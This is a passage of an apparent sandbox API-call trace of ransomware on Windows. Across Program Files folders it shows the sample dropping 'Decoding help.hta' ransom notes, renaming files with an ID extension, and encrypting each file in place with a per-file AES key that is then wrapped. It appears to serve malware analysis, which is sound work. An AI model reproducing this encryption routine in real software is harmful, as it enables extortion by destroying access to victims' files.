(x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.939] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" [0039.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.939] lstrcmpiW (lpString1="Decoding help.hta", lpString2="suffernorwegianfifteen.exe") returned -1 [0039.939] lstrlenW (lpString="suffernorwegianfifteen.exe") returned 26 [0039.939] lstrcmpiW (lpString1="[ID]", lpString2=".exe") returned 1 [0039.939] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.939] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.939] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="suffernorwegianfifteen.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe" [0039.939] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe" [0039.939] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\suffernorwegianfifteen.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\suffernorwegianfifteen.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\suffernorwegianfifteen.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0039.940] CreateFileMappingA (hFile=0x220, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x230 [0039.940] CryptAcquireContextA (in: phProv=0xa8cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa8cfcec*=0x5b0220) returned 1 [0039.941] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0xa8cfce8 | out: phKey=0xa8cfce8*=0x5a5870) returned 1 [0039.941] CryptExportKey (in: hKey=0x5a5870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa8cfbe4, pdwDataLen=0xa8cfce4 | out: pbData=0xa8cfbe4*, pdwDataLen=0xa8cfce4*=0x2c) returned 1 [0039.941] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x9ed0000 [0039.944] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8cfbe4*, pdwDataLen=0xa8cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa8cfbe4*, pdwDataLen=0xa8cfcf8*=0x100) returned 1 [0039.944] CryptEncrypt (in: hKey=0x5a5870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9ed0000, pdwDataLen=0xa8cfce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x9ed0000*, pdwDataLen=0xa8cfce4*=0x12800) returned 1 [0039.945] UnmapViewOfFile (lpBaseAddress=0x9ed0000) returned 1 [0039.946] CloseHandle (hObject=0x230) returned 1 [0039.947] CryptDestroyKey (hKey=0x5a5870) returned 1 [0039.947] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.947] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.947] WriteFile (in: hFile=0x220, lpBuffer=0xa8cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa8cfcf8, lpOverlapped=0x0 | out: lpBuffer=0xa8cfbe4*, lpNumberOfBytesWritten=0xa8cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.947] WriteFile (in: hFile=0x220, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa8cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa8cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.947] CloseHandle (hObject=0x220) returned 1 [0039.949] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\suffernorwegianfifteen.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.949] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4115360, ftCreationTime.dwHighDateTime=0x1d4fac8, ftLastAccessTime.dwLowDateTime=0x987df1f0, ftLastAccessTime.dwHighDateTime=0x1d4b88c, ftLastWriteTime.dwLowDateTime=0x987df1f0, ftLastWriteTime.dwHighDateTime=0x1d4b88c, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="suffernorwegianfifteen.exe", cAlternateFileName="SUFFER~1.EXE")) returned 0 [0039.949] FindClose (in: hFindFile=0x5a5830 | out: hFindFile=0x5a5830) returned 1 Thread: id = 107 os_tid = 0xbe0 [0039.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*", lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10362ed0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10362ed0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5630 [0039.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.865] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10362ed0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10362ed0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.865] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.865] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49515170, ftCreationTime.dwHighDateTime=0x1d4d7dc, ftLastAccessTime.dwLowDateTime=0xeaa40140, ftLastAccessTime.dwHighDateTime=0x1d4c5bb, ftLastWriteTime.dwLowDateTime=0xeaa40140, ftLastWriteTime.dwHighDateTime=0x1d4c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="liverevilusage.exe", cAlternateFileName="LIVERE~1.EXE")) returned 1 [0039.865] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" [0039.865] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned 55 [0039.865] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta" [0039.865] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows portable devices\\decoding help.hta")) returned 0xffffffff [0039.865] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows portable devices\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0039.895] WriteFile (in: hFile=0x244, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xaa0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xaa0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.896] CloseHandle (hObject=0x244) returned 1 [0039.896] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.896] lstrcmpiW (lpString1="Decoding help.hta", lpString2="liverevilusage.exe") returned -1 [0039.896] lstrlenW (lpString="liverevilusage.exe") returned 18 [0039.896] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" [0039.896] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned 55 [0039.896] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\", lpString2="liverevilusage.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe" [0039.896] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe" [0039.896] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\liverevilusage.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows portable devices\\liverevilusage.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.897] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows portable devices\\liverevilusage.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0039.897] CreateFileMappingA (hFile=0x244, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x248 [0039.897] CryptAcquireContextA (in: phProv=0xaa0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xaa0fcec*=0x5e8130) returned 1 [0039.898] CryptGenKey (in: hProv=0x5e8130, Algid=0x6610, dwFlags=0x1, phKey=0xaa0fce8 | out: phKey=0xaa0fce8*=0x5a58f0) returned 1 [0039.898] CryptExportKey (in: hKey=0x5a58f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xaa0fbe4, pdwDataLen=0xaa0fce4 | out: pbData=0xaa0fbe4*, pdwDataLen=0xaa0fce4*=0x2c) returned 1 [0039.898] MapViewOfFile (hFileMappingObject=0x248, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x13920000 [0039.900] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xaa0fbe4*, pdwDataLen=0xaa0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xaa0fbe4*, pdwDataLen=0xaa0fcf8*=0x100) returned 1 [0039.900] CryptEncrypt (in: hKey=0x5a58f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x13920000, pdwDataLen=0xaa0fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x13920000*, pdwDataLen=0xaa0fce4*=0x12800) returned 1 [0039.901] UnmapViewOfFile (lpBaseAddress=0x13920000) returned 1 [0039.903] CloseHandle (hObject=0x248) returned 1 [0039.903] CryptDestroyKey (hKey=0x5a58f0) returned 1 [0039.903] CryptReleaseContext (hProv=0x5e8130, dwFlags=0x0) returned 1 [0039.903] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.903] WriteFile (in: hFile=0x244, lpBuffer=0xaa0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xaa0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xaa0fbe4*, lpNumberOfBytesWritten=0xaa0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.904] WriteFile (in: hFile=0x244, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xaa0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xaa0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.904] CloseHandle (hObject=0x244) returned 1 [0039.905] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\liverevilusage.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.905] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb42e9705, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb42e9705, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb430f865, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0039.905] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" [0039.905] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned 55 [0039.905] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta" [0039.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows portable devices\\decoding help.hta")) returned 0x1 [0039.905] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sqmapi.dll") returned -1 [0039.905] lstrlenW (lpString="sqmapi.dll") returned 10 [0039.905] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" [0039.906] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned 55 [0039.906] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\", lpString2="sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll" [0039.906] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll" [0039.906] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll" (normalized: "c:\\program files (x86)\\windows portable devices\\sqmapi.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows portable devices\\sqmapi.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.906] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb42e9705, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb42e9705, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb430f865, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0039.906] FindClose (in: hFindFile=0x5a5630 | out: hFindFile=0x5a5630) returned 1 Thread: id = 108 os_tid = 0xbe4 [0039.892] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*", lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55b0 [0039.935] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.935] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.935] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.935] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.935] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.935] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.935] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.935] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.936] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0039.936] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0039.936] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US" [0039.936] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" [0039.936] GlobalMemoryStatus (in: lpBuffer=0xab4fd10 | out: lpBuffer=0xab4fd10) [0039.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f00e18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0039.963] CloseHandle (hObject=0x1e8) returned 1 [0039.963] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0039.963] lstrcmpW (lpString1=".", lpString2="Gadgets") returned -1 [0039.963] lstrcmpW (lpString1="..", lpString2="Gadgets") returned -1 [0039.963] lstrcmpiW (lpString1="windows", lpString2="Gadgets") returned 1 [0039.963] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0039.964] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0039.964] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="Gadgets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets" [0039.964] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0039.964] GlobalMemoryStatus (in: lpBuffer=0xab4fd10 | out: lpBuffer=0xab4fd10) [0039.964] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9388250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0039.969] CloseHandle (hObject=0x1e8) returned 1 [0039.969] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b6cc007, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b6cc007, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xadcc4370, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll", cAlternateFileName="")) returned 1 [0039.969] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0039.969] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0039.969] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" [0039.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\decoding help.hta")) returned 0xffffffff [0039.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0039.969] WriteFile (in: hFile=0x1e8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xab4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xab4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.970] CloseHandle (hObject=0x1e8) returned 1 [0039.971] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.971] lstrcmpiW (lpString1="Decoding 